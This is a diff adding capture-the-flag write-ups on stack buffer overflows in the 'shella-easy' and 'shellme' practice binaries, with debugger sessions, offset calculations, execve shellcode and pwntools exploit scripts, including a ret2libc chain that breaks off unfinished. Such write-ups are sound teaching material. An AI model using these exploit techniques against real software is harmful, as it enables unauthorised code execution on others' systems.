+ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 27 │····│····│····│···'│
+ 00000130 d7 ff │··│
+ 00000132
+ [*] Switching to interactive mode
+ [*] Got EOF while reading in interactive
+ $cat flag.txt
+ flag{g0ttem_b0yz}
+ $ exit
+ [*] Got EOF while reading in interactive
+ $ exit
+ [*] Process './pwn3' stopped with exit code 0 (pid 524665)
+ [*] Got EOF while sending in interactive
+
+
+
+
+And that's it! We have been able to print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/shella.md b/2/shella.md
new file mode 100644
index 0000000..fdcf471
--- /dev/null
+++ b/2/shella.md
@@ -0,0 +1,387 @@
+# TuCTF 2018 Shella-Easy
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy
+ --2021-03-05 17:20:57-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy [following]
+ --2021-03-05 17:20:57-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7404 (7.2K) [application/octet-stream]
+ Saving to: ‘shella-easy’
+
+ shella-easy 100%[============================================================================================================================================================================>] 7.23K --.-KB/s in 0s
+
+ 2021-03-05 17:20:57 (20.9 MB/s) - ‘shella-easy’ saved [7404/7404]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → file shella-easy
+ shella-easy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=38de2077277362023aadd2209673b21577463b66, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → chmod +X shella-easy
+
+
+
+` ![]()
+
+## Solution
+
+First let's run the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → ./shella-easy
+ Yeah I'll have a 0xffa70630 with a side of fries thanks
+ yes
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → ./shella-easy
+ Yeah I'll have a 0xff94b1a0 with a side of fries thanks
+ no
+
+
+
+Very similar to the previous challenge we did, the binary prints out some text with a memory address, and then asks us for some text input. Let's see what we can find in ghidra:
+
+
+
+Which gives us the following code:
+
+
+ undefined4 main(void)
+
+ {
+ char local_4c [64];
+ int local_c;
+
+ setvbuf(stdout,(char *)0x0,2,0x14);
+ setvbuf(stdin,(char *)0x0,2,0x14);
+ local_c = -0x35014542;
+ printf("Yeah I\'ll have a %p with a side of fries thanks\n",local_4c);
+ gets(local_4c);
+ if (local_c != -0x21524111) {
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ return 0;
+ }
+
+
+
+Here we see that our input text gets stored into the variable local_4c and gets passed through a gets() function, and we know that the gets call does not restrict user input, therefore we know we can do a buffer overflow thanks to it. The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+However, according to the decompiled code, the function exit is called, when this function is called, the ret instruction will not run in the context of this function, so we won't get code execution. So let's look at the assembly :
+
+
+
+
+ 08048539 e8 52 fe CALL gets char * gets(char * __s)
+ ff ff
+ 0804853e 83 c4 04 ADD ESP,0x4
+ 08048541 81 7d f8 CMP dword ptr [EBP + local_c],0xdeadbeef
+ ef be ad de
+ 08048548 74 07 JZ LAB_08048551
+ 0804854a 6a 00 PUSH 0x0
+ 0804854c e8 4f fe CALL exit void exit(int __status)
+ ff ff
+ -- Flow Override: CALL_RETURN (CALL_TERMINATOR)
+ LAB_08048551 XREF[1]: 08048548(j)
+ 08048551 b8 00 00 MOV EAX,0x0
+ 00 00
+ 08048556 8b 5d fc MOV EBX,dword ptr [EBP + local_8]
+ 08048559 c9 LEAVE
+ 0804855a c3 RET
+
+
+
+Here we see that there is a check to see if the variable local_c is equal to 0xdeadbeef, and if it is, the function doesn't call exit(0), and we end up with our code execution. Now let's take a look at the stack layout in ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined4 Stack[-0x8]:4 local_8 XREF[1]: 08048556(R)
+ undefined4 Stack[-0xc]:4 local_c XREF[2]: 0804851b(W),
+ 08048541(R)
+ undefined1 Stack[-0x4c]:1 local_4c XREF[2]: 08048522(*),
+ 08048535(*)
+ main XREF[4]: Entry Point(*),
+ _start:080483f7(*), 08048630,
+ 080486a0(*)
+ 080484db 55 PUSH EBP
+
+
+
+We see that the local_c variable is within range of our overflowing variable (local_4c) where we put our text in. So, now that we know that, we need to find out what the offset is between the memory address of our input and the memory address of the return address, to do so we use gdb:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → gdb ./shella-easy
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./shella-easy...
+ (No debugging symbols found in ./shella-easy)
+ gef➤ disas main
+ Dump of assembler code for function main:
+ 0x080484db <+0>: push ebp
+ 0x080484dc <+1>: mov ebp,esp
+ 0x080484de <+3>: push ebx
+ 0x080484df <+4>: sub esp,0x44
+ 0x080484e2 <+7>: call 0x8048410 <__x86.get_pc_thunk.bx>
+ 0x080484e7 <+12>: add ebx,0x1b19
+ 0x080484ed <+18>: mov eax,DWORD PTR [ebx-0x4]
+ 0x080484f3 <+24>: mov eax,DWORD PTR [eax]
+ 0x080484f5 <+26>: push 0x14
+ 0x080484f7 <+28>: push 0x2
+ 0x080484f9 <+30>: push 0x0
+ 0x080484fb <+32>: push eax
+ 0x080484fc <+33>: call 0x80483c0
+ 0x08048501 <+38>: add esp,0x10
+ 0x08048504 <+41>: mov eax,DWORD PTR [ebx-0x8]
+ 0x0804850a <+47>: mov eax,DWORD PTR [eax]
+ 0x0804850c <+49>: push 0x14
+ 0x0804850e <+51>: push 0x2
+ 0x08048510 <+53>: push 0x0
+ 0x08048512 <+55>: push eax
+ 0x08048513 <+56>: call 0x80483c0
+ 0x08048518 <+61>: add esp,0x10
+ 0x0804851b <+64>: mov DWORD PTR [ebp-0x8],0xcafebabe
+ 0x08048522 <+71>: lea eax,[ebp-0x48]
+ 0x08048525 <+74>: push eax
+ 0x08048526 <+75>: lea eax,[ebx-0x1a20]
+ 0x0804852c <+81>: push eax
+ 0x0804852d <+82>: call 0x8048380
+ 0x08048532 <+87>: add esp,0x8
+ 0x08048535 <+90>: lea eax,[ebp-0x48]
+ 0x08048538 <+93>: push eax
+ 0x08048539 <+94>: call 0x8048390
+ 0x0804853e <+99>: add esp,0x4
+ 0x08048541 <+102>: cmp DWORD PTR [ebp-0x8],0xdeadbeef
+ 0x08048548 <+109>: je 0x8048551
+ 0x0804854a <+111>: push 0x0
+ 0x0804854c <+113>: call 0x80483a0
+ 0x08048551 <+118>: mov eax,0x0
+ 0x08048556 <+123>: mov ebx,DWORD PTR [ebp-0x4]
+ 0x08048559 <+126>: leave
+ 0x0804855a <+127>: ret
+ End of assembler dump.
+
+
+
+Here we want to set a breakpoint after the gets call at +99:
+
+
+ gef➤ b *main+99
+ Breakpoint 1 at 0x804853e
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/shella/shella-easy
+ Yeah I'll have a 0xffffd0a0 with a side of fries thanks
+ 13371337
+
+ Breakpoint 1, 0x0804853e in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xffffd0a0 → "13371337"
+ $ebx : 0x0804a000 → 0x08049f0c → 0x00000001
+ $ecx : 0xf7f90540 → 0xfbad208b
+ $edx : 0xfbad208b
+ $esp : 0xffffd09c → 0xffffd0a0 → "13371337"
+ $ebp : 0xffffd0e8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x080483e0 → <_start+0> xor ebp, ebp
+ $eip : 0x0804853e → add esp, 0x4
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd09c│+0x0000: 0xffffd0a0 → "13371337" ← $esp
+ 0xffffd0a0│+0x0004: "13371337"
+ 0xffffd0a4│+0x0008: "1337"
+ 0xffffd0a8│+0x000c: 0x00000000
+ 0xffffd0ac│+0x0010: 0xf7dd8b82 → <__internal_atexit+66> add esp, 0x10
+ 0xffffd0b0│+0x0014: 0xf7f903bc → 0xf7f919e0 → 0x00000000
+ 0xffffd0b4│+0x0018: 0xffffffff
+ 0xffffd0b8│+0x001c: 0x080483e0 → <_start+0> xor ebp, ebp
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x8048535 lea eax, [ebp-0x48]
+ 0x8048538 push eax
+ 0x8048539 call 0x8048390
+ → 0x804853e add esp, 0x4
+ 0x8048541 cmp DWORD PTR [ebp-0x8], 0xdeadbeef
+ 0x8048548 je 0x8048551
+ 0x804854a push 0x0
+ 0x804854c call 0x80483a0
+ 0x8048551 mov eax, 0x0
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "shella-easy", stopped 0x804853e in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x804853e → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+After setting the breakpoint, we ran the binary, and then we passed a pattern that is easy to remember (13371337).Now that we hit our breakpoint, we want to know where is our pattern located:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
+ 0xffffd0a0 - 0xffffd0a8 → "13371337"
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0f0:
+ eip = 0x804853e in main; saved eip = 0xf7dbfa0d
+ Arglist at 0xffffd0e8, args:
+ Locals at 0xffffd0e8, Previous frame's sp is 0xffffd0f0
+ Saved registers:
+ ebx at 0xffffd0e4, ebp at 0xffffd0e8, eip at 0xffffd0ec
+
+
+
+Here we see that our 13371337 pattern is located at **0xffffd0a0** and the return address is located at **0xffffd0ec** so let's calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/shella]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0xffffd0a0 - 0xffffd0ec )
+ '-0x4c'
+
+
+
+And we see that we have a 0x4c offset between our input text and the return function. With this we can create our exploit using the shellcode we used for the previous challenge:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/shella]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./shella-easy')
+
+ leak = target.recvline()
+ leak = leak.strip(b"Yeah I'll have a ")
+ leak = leak.strip(b" with a side of fries thanks\n")
+
+ Adr = int(leak, 16)
+
+ payload = b""
+ # http://shell-storm.org/shellcode/files/shellcode-827.php
+ payload += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+ payload += b"\x00" * (0x40 - len(payload)) # Padding to the local_c variable
+ payload += p32(0xdeadbeef) #overwrite local_c with 0xdeadbeef
+ payload += b"\x00"*8 #padding to the return address
+ payload += p32(Adr) # Overwrite the return address to point to the start of our payload, where the shellcode is
+
+
+ #hexdump the payload:
+ print(hexdump(payload))
+
+
+
+Here we can see our payload (shellcode + nullbytes to get to 0x40 + little endian deadbeef + 8 nullbytes + little endian leaked address):
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → python3 exploit.py
+ [+] Starting local process './shella-easy': pid 1269456
+ 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 │1·Ph│//sh│h/bi│n··P│
+ 00000010 53 89 e1 b0 0b cd 80 00 00 00 00 00 00 00 00 00 │S···│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000040 ef be ad de 00 00 00 00 00 00 00 00 10 0a 84 ff │····│····│····│····│
+ 00000050
+
+
+
+Now we send the payload to the binary file with the following 2 lines:
+
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/shme.md b/2/shme.md
new file mode 100644
index 0000000..cd5d0f8
--- /dev/null
+++ b/2/shme.md
@@ -0,0 +1,490 @@
+# Utc 2019 shellme
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/utc19_shellme/libc6_2.27-3ubuntu1_i386.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/utc19_shellme/server
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → file server
+ server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=be2f490cdd60374344e1075c9dd31060666bd524, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → chmod +x server
+
+
+
+` ![]()
+
+## Solution
+
+First let's run pwn checksec on the binary file, and then execute it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → pwn checksec server; ./server
+ [*] '/home/nothing/binexp/2/shme/server'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd2a2e0 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a2e8 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a2f0 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a2f8 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a300 | ff ff ff ff ff ff ff ff |
+ 0xffd2a308 | ff ff ff ff ff ff ff ff |
+ 0xffd2a310 | 40 d5 f0 f7 00 a0 04 08 |
+ 0xffd2a318 | 28 a3 d2 ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+ Input some text: here is some text
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd2a2e0 | 68 65 72 65 20 69 73 20 |
+ 0xffd2a2e8 | 73 6f 6d 65 20 74 65 78 |
+ 0xffd2a2f0 | 74 00 00 00 00 00 00 00 |
+ 0xffd2a2f8 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a300 | ff ff ff ff ff ff ff ff |
+ 0xffd2a308 | ff ff ff ff ff ff ff ff |
+ 0xffd2a310 | 40 d5 f0 f7 00 a0 04 08 |
+ 0xffd2a318 | 28 a3 d2 ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+
+
+We see that we are dealing with a 32bit binary that has NX enabled, when we run the binary, and put in too much text we get the following:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → ./server
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd19e90 | 00 00 00 00 00 00 00 00 |
+ 0xffd19e98 | 00 00 00 00 00 00 00 00 |
+ 0xffd19ea0 | 00 00 00 00 00 00 00 00 |
+ 0xffd19ea8 | 00 00 00 00 00 00 00 00 |
+ 0xffd19eb0 | ff ff ff ff ff ff ff ff |
+ 0xffd19eb8 | ff ff ff ff ff ff ff ff |
+ 0xffd19ec0 | 40 75 ef f7 00 a0 04 08 |
+ 0xffd19ec8 | d8 9e d1 ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+ Input some text: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd19e90 | 30 30 30 30 30 30 30 30 |
+ 0xffd19e98 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ea0 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ea8 | 30 30 30 30 30 30 30 30 |
+ 0xffd19eb0 | 30 30 30 30 30 30 30 30 |
+ 0xffd19eb8 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ec0 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ec8 | 30 30 30 30 30 30 30 30 |
+ Return address: 0x30303030
+
+ [1] 1782143 segmentation fault (core dumped) ./server
+
+
+
+
+So here we see that we can cause a seg fault when we put in too much text, now let's take a look at it from inside ghidra:
+
+
+
+Luckily this time the main function is actually called 'main' so it was easy to find, we get the following code:
+
+
+ undefined4 main(void)
+
+ {
+ undefined *puVar1;
+
+ puVar1 = &stack0x00000004;
+ setbuf(stdout,(char *)0x0);
+ setbuf(stdin,(char *)0x0);
+ vuln(puVar1);
+ return 0;
+ }
+
+
+
+Here we see a function called 'vuln' so let's take a look at it:
+
+
+ void vuln(void)
+
+ {
+ char local_3c [32];
+ undefined local_1c [20];
+
+ memset(local_3c,0,0x20);
+ memset(local_1c,0xff,0x10);
+ init_visualize(local_3c);
+ visualize(local_3c);
+ printf("Input some text: ");
+ gets(local_3c);
+ visualize(local_3c);
+ return;
+ }
+
+
+Here we see that local_3c is initially set to be able to hold only 32 bytes of data, but then we see that it gets passed into a gets() call, and we know that gets calls are vulnerable to buffer overflows because it doesn't restrict our input at all. Plus since there is no stack canary, we can overwrite the return address and get code execution, so we let's set a breakpoint after the gets call, and see where our text input is stored in memory:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → gdb ./server
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./server...
+ (No debugging symbols found in ./server)
+ gef➤ disas vulnm
+ No symbol table is loaded. Use the "file" command.
+ gef➤ disas vuln
+ Dump of assembler code for function vuln:
+ 0x080485b1 <+0>: push ebp
+ 0x080485b2 <+1>: mov ebp,esp
+ 0x080485b4 <+3>: push ebx
+ 0x080485b5 <+4>: sub esp,0x34
+ 0x080485b8 <+7>: call 0x80484c0 <__x86.get_pc_thunk.bx>
+ 0x080485bd <+12>: add ebx,0x1a43
+ 0x080485c3 <+18>: sub esp,0x4
+ 0x080485c6 <+21>: push 0x20
+ 0x080485c8 <+23>: push 0x0
+ 0x080485ca <+25>: lea eax,[ebp-0x38]
+ 0x080485cd <+28>: push eax
+ 0x080485ce <+29>: call 0x8048440
+ 0x080485d3 <+34>: add esp,0x10
+ 0x080485d6 <+37>: sub esp,0x4
+ 0x080485d9 <+40>: push 0x10
+ 0x080485db <+42>: push 0xff
+ 0x080485e0 <+47>: lea eax,[ebp-0x18]
+ 0x080485e3 <+50>: push eax
+ 0x080485e4 <+51>: call 0x8048440
+ 0x080485e9 <+56>: add esp,0x10
+ 0x080485ec <+59>: sub esp,0xc
+ 0x080485ef <+62>: lea eax,[ebp-0x38]
+ 0x080485f2 <+65>: push eax
+ 0x080485f3 <+66>: call 0x804869e
+ 0x080485f8 <+71>: add esp,0x10
+ 0x080485fb <+74>: sub esp,0xc
+ 0x080485fe <+77>: lea eax,[ebp-0x38]
+ 0x08048601 <+80>: push eax
+ 0x08048602 <+81>: call 0x80486e1
+ 0x08048607 <+86>: add esp,0x10
+ 0x0804860a <+89>: sub esp,0xc
+ 0x0804860d <+92>: lea eax,[ebx-0x16dd]
+ 0x08048613 <+98>: push eax
+ 0x08048614 <+99>: call 0x80483f0
+ 0x08048619 <+104>: add esp,0x10
+ 0x0804861c <+107>: sub esp,0xc
+ 0x0804861f <+110>: lea eax,[ebp-0x38]
+ 0x08048622 <+113>: push eax
+ 0x08048623 <+114>: call 0x8048400
+ 0x08048628 <+119>: add esp,0x10
+ 0x0804862b <+122>: sub esp,0xc
+ 0x0804862e <+125>: lea eax,[ebp-0x38]
+ 0x08048631 <+128>: push eax
+ 0x08048632 <+129>: call 0x80486e1
+ 0x08048637 <+134>: add esp,0x10
+ 0x0804863a <+137>: nop
+ 0x0804863b <+138>: mov ebx,DWORD PTR [ebp-0x4]
+ 0x0804863e <+141>: leave
+ 0x0804863f <+142>: ret
+ End of assembler dump.
+ gef➤ b *vuln+119
+ Breakpoint 1 at 0x8048628
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/shme/server
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffffd0a0 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0a8 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0b0 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0b8 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0c0 | ff ff ff ff ff ff ff ff |
+ 0xffffd0c8 | ff ff ff ff ff ff ff ff |
+ 0xffffd0d0 | 40 05 f9 f7 00 a0 04 08 |
+ 0xffffd0d8 | e8 d0 ff ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+ Input some text: 13371337
+
+ Breakpoint 1, 0x08048628 in vuln ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xffffd0a0 → "13371337"
+ $ebx : 0x0804a000 → 0x08049f0c → 0x00000001
+ $ecx : 0xf7f90540 → 0xfbad208b
+ $edx : 0xfbad208b
+ $esp : 0xffffd090 → 0xffffd0a0 → "13371337"
+ $ebp : 0xffffd0d8 → 0xffffd0e8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x08048470 → <_start+0> xor ebp, ebp
+ $eip : 0x08048628 → add esp, 0x10
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd090│+0x0000: 0xffffd0a0 → "13371337" ← $esp
+ 0xffffd094│+0x0004: 0x000000ff
+ 0xffffd098│+0x0008: 0x00000010
+ 0xffffd09c│+0x000c: 0x080485bd → add ebx, 0x1a43
+ 0xffffd0a0│+0x0010: "13371337"
+ 0xffffd0a4│+0x0014: "1337"
+ 0xffffd0a8│+0x0018: 0x00000000
+ 0xffffd0ac│+0x001c: 0x00000000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x804861f lea eax, [ebp-0x38]
+ 0x8048622 push eax
+ 0x8048623 call 0x8048400
+ → 0x8048628 add esp, 0x10
+ 0x804862b sub esp, 0xc
+ 0x804862e lea eax, [ebp-0x38]
+ 0x8048631 push eax
+ 0x8048632 call 0x80486e1
+ 0x8048637 add esp, 0x10
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "server", stopped 0x8048628 in vuln (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x8048628 → vuln()
+ [#1] 0x804868b → main()
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So what we did here was first disassemble the vuln function, set the breakpoint to be right after the gets call, and then run the binary, we gave it a simple pattern (13371337) and then we hit our breakpoint. So let's search for our pattern in memory, to determine the offset in between our input and the return address:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffd0a0 - 0xffffd0a8 → "13371337"
+
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0e0:
+ eip = 0x8048628 in vuln; saved eip = 0x804868b
+ called by frame at 0xffffd100
+ Arglist at 0xffffd0d8, args:
+ Locals at 0xffffd0d8, Previous frame's sp is 0xffffd0e0
+ Saved registers:
+ ebx at 0xffffd0d4, ebp at 0xffffd0d8, eip at 0xffffd0dc
+
+
+
+Here we see that our input text is at **0xffffd0a0** and the return address is at **0xffffd0dc** So we can easily find the offset from a python3 shell:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [Nextcloud/blog]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0xffffd0a0 - 0xffffd0dc )
+ '-0x3c'
+
+
+
+And here we see that we have a 0x3c bytes offset between our text input and the return address. The idea here is that we're going to call an instruction pointer, but what is it that we're going to call ? All we need is just 2 libc infoleaks, and it can become possible to identify the libc versions.
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/27 ] [binexp/2/shme]
+ → objdump -D server | grep puts
+ 08048410 <****puts@plt>:
+ 8048704: e8 07 fd ff ff call 8048410 <****puts@plt>
+ 8048716: e8 f5 fc ff ff call 8048410 <****puts@plt>
+ 8048846: e8 c5 fb ff ff call 8048410 <****puts@plt>
+ 8048881: e8 8a fb ff ff call 8048410 <****puts@plt>
+
+` ****
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/27 ] [binexp/2/shme]
+ → vim exploit.py
+
+
+
+We're going to make use of guyinatuxedo's ['TheNight']() Python library:
+
+
+ import TheNight
+ from pwn import *
+
+
+ libc = ELF("libc6_2.27-3ubuntu1_i386.so")
+ target = process("./server")
+ elf = ELF('server')
+
+
+ payload = ""
+ payload += "0"*0x3c
+ payload += p32(elf.symbols["puts"])
+ payload += p32(elf.symbols["vuln"])
+ payload += p32(elf.got["puts"])
+
+ target.sendline(payload)
+
+
+ for i in range(0, 2):
+ print target.recvuntil("Return address:")
+
+
+ for i in range(0, 2):
+ print target.recvline()
+
+
+ leak0 = target.recvline()[0:4]
+
+ puts = u32(leak0)
+
+ libcBase = puts - libc.symbols["puts"]
+
+ print "libc base: " + hex(libcBase)
+
+ binshOffset = 0x17e0cf
+
+ payload1 = ""
+ payload1 += "0"*0x3c
+ payload1 += p32(libcBase + libc.symbols["system"])
+ payload1 += p32(0x30303030)
+ payload1 += p32(libcBase + binshOffset)
+
